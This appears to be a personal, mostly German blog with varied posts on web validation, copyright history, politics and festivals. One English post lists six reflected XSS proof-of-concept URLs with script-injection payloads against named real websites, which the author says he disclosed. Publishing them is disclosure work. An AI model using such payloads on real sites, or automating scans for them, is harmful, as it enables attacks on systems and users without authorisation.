Hanno's blog

Bin seit gestern auf dem Wendlandcamp. Wie man sieht, hat sich der Freifunk Wendlandcamp schon ausgebreitet.

Zum guten Stil professionellen Webdesigns gehört inzwischen, valides (d. h. fehlerfreies) HTML einzusetzen. Testwerkzeug hierfür ist der Validator des W3C, dem Gremium, welches für die Standardisierung von HTML und Co. verantwortlich ist. Für einige Anforderungen, etwa Barrierefreiheit, ist valider Code sogar Voraussetzung (auch wenn viele Anbieter behaupten, barrierefreie Seiten zu erstellen, und dieses Grundkriterium nicht erfüllen).

Der Validator kommt seit kurzem in zeitgemäßerem Design und einigen neuen Features. Einige zusätzliche Fehlermeldungen und Warnungen erfordern nun noch mehr Sorgfalt vom Webdesigner.

Als erstes wurde mir mitgeteilt, dass meine XHTML-Seiten doch bitte mit dem MIME-Type xml ausgeliefert werden sollten, was ich ja gerne schon seit Jahren tun würde. Leider ist da wohl noch Stand der Dinge, dass ein Browser eines gewissen großen Herstellers, der unverständlicherweise immer noch sehr verbreitet ist, selbst in der neuesten Version 7 (die immerhin mal die gröbsten HTML/CSS-Bugs ausgemerzt hat), XHTML-Dokumente immer noch nicht mit XML-Mimetype akzeptiert.

Als kleiner Tipp, den ich immer wieder nützlich finde: Für XHTML-Seiten und andere XML-basierte Dokumente (etwa RSS und Atom-Feeds), kann mit

lynx --source http://someurl/ | xmllint --noout -

auf einfache Weise die Korrektheit des Codes überprüft werden. Ein Cron-Job ist hier sicher eine gute Idee.

Ab und an beteilige ich mich an einem kleinen Zeitschriftenprojekt, dem Grünen Blatt. Für die aktuelle Ausgabe (von der ich nicht weiss, ob sie schon in Druckform vorliegt, müsste aber demnächst der Fall sein) schrieb ich zwei Artikel, einen über den Neubau von Kohlekraftwerken und einen über's Kyoto-Protokoll. Letzterer erschien auch in der Contraste - Monatszeitung für Selbstorganisation mit dem Schwerpunkt Bahn und Verkehr.

Wie üblich - Copyright ist Aberglaube - darf natürlich kopiert und weiterverwertet werden - Quellenangabe und Namensnennung obligatorisch, Belegexemplar wäre nett.

Kleine Lehre von heute: Es ist prinzipiell keine gute Idee, wenn die Fehlermeldungen eines Web-Frameworks die Zugangsdaten zur Datenbank enthalten. Wenn sich dann gleichzeitig noch unter leicht auffindbarer URL ein phpMyAdmin befindet, ist das eher noch schlechter.
(URL und Projektname gibt's erstmal nicht, weil das bislang nur teilweise gefixt wurde)

Desweiteren soll es jetzt ein neues, aktiveres Stadtblog für Karlsruhe geben. Vielleicht schreib ich bei Gelegenheit auch mal das ein oder andere.

Ansonsten gab es einige Ideen in Richtung Barcamp auf Wasser (Bodensee oder Rhein). Hört sich erstmal ziemlich cool an, bin gespannt was daraus wird.

Links: Webmontag Karlsruhe

Keine Ahnung was die Meldung bedeutet. Keine Ahnung wozu dieses Terminal da ist (steht im Stuttgarter Hauptbahnhof neben der zweiten Treppe, wenn man den linken Ausgang Richtung Klettpassage nimmt). Es steht hinten was von T-Com drauf, vermutlich so eine Bezahl-Internet-Surfstation.

Eine Frage, die mich schon länger beschäftigt, ist die nach historischen Vorläufern der Copyright-Kritik. Ist selbige vor allem ein neuzeitliches Phänomen in Zeiten von Internet-Tauschbörsen und Youtube?

Nebst verschiedenen Erscheinungen in der Popkultur (die bekanntesten wohl Negativland und KLF) und den Copyleft-artigen Vorworten der Situationistischen Internationale stößt man auch irgendwann auf die Kultur von Raubdrucken der 68er-Bewegung. Dazu fand ich bislang jedoch recht wenig Informationen, ein bißchen was steht in der Wikipedia, verlinkt ist dort dieses Interview.
Wie man auf dem Bild sehen kann, hab ich inzwischen zwei Exemplare des Verlages mit dem schönen Namen »Zerschlagt das bürgerliche Copyright« erstanden. Was mich interessieren würde: Gibt es aus dieser Zeit inhaltliche Texte? Ist mit der Einschränkung »bürgerlich« irgendein diffuses Konzept eines »besseren« (»kommunistischen«) Copyrights verbunden?

Für Hinweise und weitere Fundstücke wäre ich dankbar.

I thought I'd give you some more (all have been informed months ago):

http://thepiratebay.org/search/"><script>alert(1)</script>
http://www.gruene.de/cms/default/dok/144/144640.dokumentsuche.htm?execute=1&suche_voll_starten=1&volltext_suchbegriff="><script>alert(1)</script>
http://www.terions.de/index_whois.php?ddomain="><script>alert(1)</script>
http://www.eselfilme.com/newsletter/newsletter.php?action=sign&email="><script>alert(1)</script>
http://www.region-stuttgart.de/sixcms/rs_suche/?_suche="><script>alert(1)</script>
http://reports.internic.net/cgi/whois?whois_nic="><script>alert(1)</script>&type=domain

I still have some unresolved xss vulnerabilities around. It seems to be common practice by many web application developers and web designers to ignore such information.

This time we have gobi, a cms system based on the quite popular javascript application server helma.

http://int21.de/cve/CVE-2007-3693-gobi.txt

More to come. As this xss stuff is far too easy (try some common strings in web forms, inform the author, publish some weeks later), I think about doing some kind of automated mechanism to search and report those vulnerabilities.

Ich wünsch mir so ein Gerät schon seit weit über 10 Jahren, gestern auf dem Flohmarkt erstand ich endlich einen Nintendo 64. Damit ist meine Nintendo-Konsolensammlung, bis auf die beiden aktuellen Geräte (DS und Wii), wieder vollständig.

Der Bundesrat hat heute das obskure Verbot von »Hacktools« abgesegnet. Wohl ohne großen Widerstand, wiewohl praktisch jeder, der sich auch nur ansatzweise damit auskennt, das ganze für völlig absurd halten muss. In seltener Einigkeit warnen vom CCC über die GI bis zur Bitkom alle vor dem Gesetzeswerk.

Aber weswegen ich das hier schreibe: Die tagesschau erklärt das ganze sehr brauchbar, was ich dachte, dass ich doch mal lobend erwähnen kann. Vielleicht ein kleiner Beitrag, dass auch nicht-Techies derartiges besser verstehen.

Noch eine kleine Anekdote vom Southside: Dort tummelte sich eine Gruppe von christlichen Fundamentalisten, die an einem Infostand Drogen-»Aufklärung« betrieben. So fand sich dort etwa eine Broschüre, in der auf die Gefahren von einer Überdosis bei Cannabiskonsum gewarnt wurde.

Noch interessanter indes war ein kleines Büchlein, in welchem die tragischen Geschichten verschiedener Rocklegenden, die an Drogen starben, aufgezählt waren. Nebst den zu erwartenden fand dort auch John Lennon Erwähnung - welcher im Alter von 40 Jahren erschossen wurde.
Weswegen nun selbiger als Drogentoter zu gelten hat, erklärt man so: John Lennon betrieb ein ausschweifendes Leben mit Sex und Drogen, welches ihn auch zu okkultistischen Ritualen führte. Desweiteren gab Lennon zu Lebzeiten zu, Heroin und LSD konsumiert zu haben. Auch in den Songs der Beatles finden sich Hinweise auf Drogen und Okkultismus.
Und nun die schockierende Erkenntnis: Der Attentäter, Mark Chapman (übrigens im Buch falsch Marc geschrieben), gab nach seiner Tat zu, dass Stimmen des Teufels ihn zum Mord verleitet hätten.

Ergo: Drogenkonsum - Okkultismus - der Teufel schickt einem einen Mörder vorbei. Angesichts dieser bahnbrechenden Erkenntnis müssen wohl sämtlichen Drogenstatistiken umgeschrieben werden.

Ich hätte den Text auch abgetippt, aber da das Büchlein kostenpflichtig auf der Seite soulsaver.de zu erstehen ist, im übrigen ein reichhaltiger Fundus an christlich-fundamentalistischer Absonderlichkeiten, befürchtete ich Copyrightklagen.

Bleibt noch die Frage, wieso auf dem »alternative music festival« Southside überhaupt solch einer Gruppe erlaubt wird, einen Infostand zu betreiben. Allerdings, der Auftritt von Marilyn Manson und der nicht zu verachtende Humorfaktor der Gruppe entschädigten doch :-)